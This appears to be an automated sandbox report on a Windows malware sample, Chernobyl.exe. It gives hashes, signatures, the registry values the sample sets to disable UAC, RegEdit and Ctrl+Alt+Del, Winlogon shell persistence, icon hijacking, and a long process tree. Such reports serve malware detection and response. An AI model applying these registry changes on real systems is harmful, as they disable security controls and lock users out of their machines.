Analysis
max time kernel: 92s
max time network: 18s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-03-2024 01:14
Static task: static1
Behavioral task: behavioral1
Sample: Chernobyl.exe
Resource: win7-20240221-en
General
Target: Chernobyl.exe
Size: 413KB
MD5: 90f47855c0625fc0afa000b37ba4bcd3
SHA1: 02970d2f2f98d3929f3758e214fc17b819eb132b
SHA256: c28963a7530038ed4bb19864f0dc1d55cf123d2d66059f24f6e4cee39b61e590
SHA512: 2571869e76207db86883b01d3f03eb6d58bf31a9e8409353f8372dfc21f61430538eb191084856aacb843cfe65c96815249979cbd163c1e11c96e3900bad798e
SSDEEP: 6144:FHvbVLjo0222222222222222222222222222222222222222222222222222222L:FOtH0zOZzv4TatsNqaJx
Malware Config
Signatures
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes (resource: yara_rule):
- behavioral1/memory/2164-0-0x000000013FB20000-0x000000013FB8C000-memory.dmp: disable_win_def
- behavioral1/memory/2164-2-0x000000001BA00000-0x000000001BA80000-memory.dmp: disable_win_def
- behavioral1/memory/2164-110-0x000000001BA00000-0x000000001BA80000-memory.dmp: disable_win_def
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
- Chernobyl.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe"
UAC bypass 1 IoCs
Processes:
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Disables RegEdit via registry modification 1 IoCs
Processes:
- Chernobyl.exe: Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
Disables Task Manager via registry modification
Possible privilege escalation attempt 64 IoCs
Processes (pid process; entries without a process name are recorded that way in the report):
4668 icacls.exe, 4640 icacls.exe, 3452 takeown.exe, 4100 icacls.exe, 4488 takeown.exe, 3292 icacls.exe, 3628 takeown.exe, 3924 takeown.exe, 3840 icacls.exe, 4276 takeown.exe, 5036 takeown.exe, 4984 icacls.exe, 5712, 592 takeown.exe, 1444 icacls.exe, 1444 icacls.exe, 3976 takeown.exe, 4292 takeown.exe, 4676 takeown.exe, 5024 icacls.exe, 2796 takeown.exe, 3840 takeown.exe, 3832 takeown.exe, 3552 takeown.exe, 4376 icacls.exe, 4440 icacls.exe, 4876 takeown.exe, 3100 takeown.exe, 3212 icacls.exe, 2484 icacls.exe, 3800, 3632 takeown.exe, 3224 takeown.exe, 3352, 3836 icacls.exe, 3660 icacls.exe, 4276 takeown.exe, 3920 icacls.exe, 4596 icacls.exe, 4264 takeown.exe, 5492, 4048 icacls.exe, 3944 takeown.exe, 3596 takeown.exe, 3768 icacls.exe, 2364 takeown.exe, 3756 icacls.exe, 3100 takeown.exe, 4056 takeown.exe, 5728, 5860, 2272 takeown.exe, 3788 icacls.exe, 3940 takeown.exe, 3444 takeown.exe, 4244 icacls.exe, 5032 icacls.exe, 5020 icacls.exe, 4740, 2560 takeown.exe, 3700 takeown.exe, 1396 takeown.exe, 5912, 3704 icacls.exe
Modifies file permissions 1 TTPs 64 IoCs
Processes (pid process; entries without a process name are recorded that way in the report):
4040 icacls.exe, 3828 takeown.exe, 3792 takeown.exe, 3976 takeown.exe, 3088 takeown.exe, 4412 icacls.exe, 4992 icacls.exe, 3836 takeown.exe, 3488 icacls.exe, 3688 icacls.exe, 4672 icacls.exe, 4704 icacls.exe, 4276 takeown.exe, 4452 takeown.exe, 4840 takeown.exe, 2480 takeown.exe, 4300, 4916, 3420 icacls.exe, 4076 icacls.exe, 3728 icacls.exe, 3416 icacls.exe, 4236 icacls.exe, 4904 takeown.exe, 4232, 3512 takeown.exe, 5584, 5912, 5308, 4604 takeown.exe, 5060 takeown.exe, 4860 takeown.exe, 3232 takeown.exe, 4864 takeown.exe, 3708 icacls.exe, 3484 icacls.exe, 3756 takeown.exe, 3756 icacls.exe, 3228 icacls.exe, 3504 takeown.exe, 4088 takeown.exe, 4668 icacls.exe, 3556 icacls.exe, 4288 icacls.exe, 4448 takeown.exe, 4488 takeown.exe, 3448 takeown.exe, 4164 takeown.exe, 4420 icacls.exe, 5244, 3188 icacls.exe, 5408, 3724 icacls.exe, 4204, 3688 takeown.exe, 2484 icacls.exe, 4276 icacls.exe, 5744, 3576 icacls.exe, 3428 takeown.exe, 4716 takeown.exe, 2528 icacls.exe, 4300 icacls.exe, 4300 takeown.exe
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
- Chernobyl.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
Checks whether UAC is enabled 2 IoCs
Processes:
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- Chernobyl.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0"
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1"
Drops file in System32 directory 2 IoCs
Processes:
- Chernobyl.exe: File opened for modification C:\Windows\System32\kill.ico
- Chernobyl.exe: File opened for modification C:\Windows\System32\wallpaper.jpg
Drops file in Windows directory 2 IoCs
Processes:
- Chernobyl.exe: File created C:\Windows\cluttscape.exe
- Chernobyl.exe: File opened for modification C:\Windows\cluttscape.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies File Icons 3 IoCs
Processes:
- Chernobyl.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons
- Chernobyl.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico"
- Chernobyl.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico"
Modifies registry class 36 IoCs
Processes (all entries by Chernobyl.exe):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes (pid process):
- 2164 Chernobyl.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (description / pid / process):
- Token: SeDebugPrivilege 2164 Chernobyl.exe (recorded twice)
- Token: SeTakeOwnershipPrivilege, one entry per takeown.exe instance, PIDs in report order: 2832, 1972, 1468, 936, 2012, 2876, 2560, 2136, 2924, 2480, 2224, 2364, 2116, 704, 2124, 2796, 2932, 564, 1900, 2596, 2364, 2604, 772, 3212, 3240, 3692, 3760, 3892, 3900, 2968, 2528, 3244, 3696, 3756, 3836, 4016, 3088, 4072, 3228, 3328, 3452, 3232, 3224, 3448, 3696, 3552, 3944, 3840, 3764, 3940, 3924, 3328, 3428, 3420, 3572, 3768, 3924, 3828, 3628, 3700, 3476, 112
Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid process -> target process; each entry appears three times in the report unless noted):
- PID 2164 Chernobyl.exe wrote to memory of 1448 cmd.exe
- PID 1448 cmd.exe wrote to memory of 2688 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 972 cmd.exe
- PID 2164 Chernobyl.exe wrote to memory of 2724 cmd.exe
- PID 972 cmd.exe wrote to memory of 2328 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 2368 cmd.exe
- PID 2724 cmd.exe wrote to memory of 1532 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 2160 cmd.exe
- PID 2368 cmd.exe wrote to memory of 1404 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 1924 cmd.exe
- PID 2164 Chernobyl.exe wrote to memory of 2324 cmd.exe
- PID 1924 cmd.exe wrote to memory of 1172 rundll32.exe
- PID 2160 cmd.exe wrote to memory of 1412 rundll32.exe
- PID 2324 cmd.exe wrote to memory of 1516 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 1520 cmd.exe
- PID 2164 Chernobyl.exe wrote to memory of 864 cmd.exe
- PID 1520 cmd.exe wrote to memory of 2728 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 2764 cmd.exe
- PID 2764 cmd.exe wrote to memory of 2756 rundll32.exe
- PID 864 cmd.exe wrote to memory of 2148 rundll32.exe
- PID 2164 Chernobyl.exe wrote to memory of 2452 cmd.exe
- PID 2164 Chernobyl.exe wrote to memory of 2028 cmd.exe (one entry)
System policy modification 1 TTPs 3 IoCs
Processes:
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1"
- Chernobyl.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Processes
- C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe (PID 2164)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
  Signatures:
  - Modifies WinLogon for persistence
  - UAC bypass
  - Disables RegEdit via registry modification
  - Modifies system executable filetype association
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies File Icons
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  Children: 54 instances of C:\Windows\System32\cmd.exe, each started with the command line
    "C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
  and each spawning one C:\Windows\system32\rundll32.exe child started with the command line
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
  The pairs below are listed in report order as cmd.exe PID -> rundll32.exe PID; the first ten cmd.exe instances also carry the signature "Suspicious use of WriteProcessMemory", the rest carry none.
  - cmd.exe 1448 -> rundll32.exe 2688 (Suspicious use of WriteProcessMemory)
  - cmd.exe 972 -> rundll32.exe 2328 (Suspicious use of WriteProcessMemory)
  - cmd.exe 2724 -> rundll32.exe 1532 (Suspicious use of WriteProcessMemory)
  - cmd.exe 2368 -> rundll32.exe 1404 (Suspicious use of WriteProcessMemory)
  - cmd.exe 2160 -> rundll32.exe 1412 (Suspicious use of WriteProcessMemory)
  - cmd.exe 1924 -> rundll32.exe 1172 (Suspicious use of WriteProcessMemory)
  - cmd.exe 2324 -> rundll32.exe 1516 (Suspicious use of WriteProcessMemory)
  - cmd.exe 1520 -> rundll32.exe 2728 (Suspicious use of WriteProcessMemory)
  - cmd.exe 864 -> rundll32.exe 2148 (Suspicious use of WriteProcessMemory)
  - cmd.exe 2764 -> rundll32.exe 2756 (Suspicious use of WriteProcessMemory)
  - cmd.exe 2452 -> rundll32.exe 2132
  - cmd.exe 2028 -> rundll32.exe 1756
  - cmd.exe 2820 -> rundll32.exe 328
  - cmd.exe 2736 -> rundll32.exe 1060
  - cmd.exe 3044 -> rundll32.exe 3004
  - cmd.exe 1796 -> rundll32.exe 1484
  - cmd.exe 1656 -> rundll32.exe 2380
  - cmd.exe 1744 -> rundll32.exe 1624
  - cmd.exe 1460 -> rundll32.exe 2304
  - cmd.exe 1188 -> rundll32.exe 1664
  - cmd.exe 1124 -> rundll32.exe 1960
  - cmd.exe 892 -> rundll32.exe 2932
  - cmd.exe 3068 -> rundll32.exe 1604
  - cmd.exe 2840 -> rundll32.exe 1236
  - cmd.exe 2236 -> rundll32.exe 2388
  - cmd.exe 884 -> rundll32.exe 1564
  - cmd.exe 2808 -> rundll32.exe 2228
  - cmd.exe 1152 -> rundll32.exe 948
  - cmd.exe 1720 -> rundll32.exe 2684
  - cmd.exe 1676 -> rundll32.exe 1560
  - cmd.exe 2496 -> rundll32.exe 2624
  - cmd.exe 3016 -> rundll32.exe 2680
  - cmd.exe 2608 -> rundll32.exe 2968
  - cmd.exe 2568 -> rundll32.exe 2436
  - cmd.exe 2708 -> rundll32.exe 2140
  - cmd.exe 2576 -> rundll32.exe 1652
  - cmd.exe 2216 -> rundll32.exe 2272
  - cmd.exe 2468 -> rundll32.exe 2492
  - cmd.exe 2428 -> rundll32.exe 2884
  - cmd.exe 2928 -> rundll32.exe 564
  - cmd.exe 2900 -> rundll32.exe 2716
  - cmd.exe 324 -> rundll32.exe 2632
  - cmd.exe 1168 -> rundll32.exe 1724
  - cmd.exe 1620 -> rundll32.exe 1428
  - cmd.exe 2344 -> rundll32.exe 1348
  - cmd.exe 1920 -> rundll32.exe 2168
  - cmd.exe 1808 -> rundll32.exe 1508
  - cmd.exe 1412 -> rundll32.exe 1140
  - cmd.exe 1244 -> rundll32.exe 2132
  - cmd.exe 1712 -> rundll32.exe 552
  - cmd.exe 2148 -> rundll32.exe 1988
  - cmd.exe 2068 -> rundll32.exe 1524
  - cmd.exe 1608 -> rundll32.exe 1060
  - cmd.exe 2984 -> rundll32.exe 1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3004
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2276
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1812
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:956
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2980
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1664
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2836
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1604
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2388
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1584
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2308
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2372
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2672
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2556
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2804
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2660
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2440
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2416
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2536
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3048
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2352
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:596
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2688
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2716
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1092
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1224
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2728
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2088
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1476
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2008
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2128
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:740
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1200
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1016
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2076
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:900
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1740
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2112
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1116
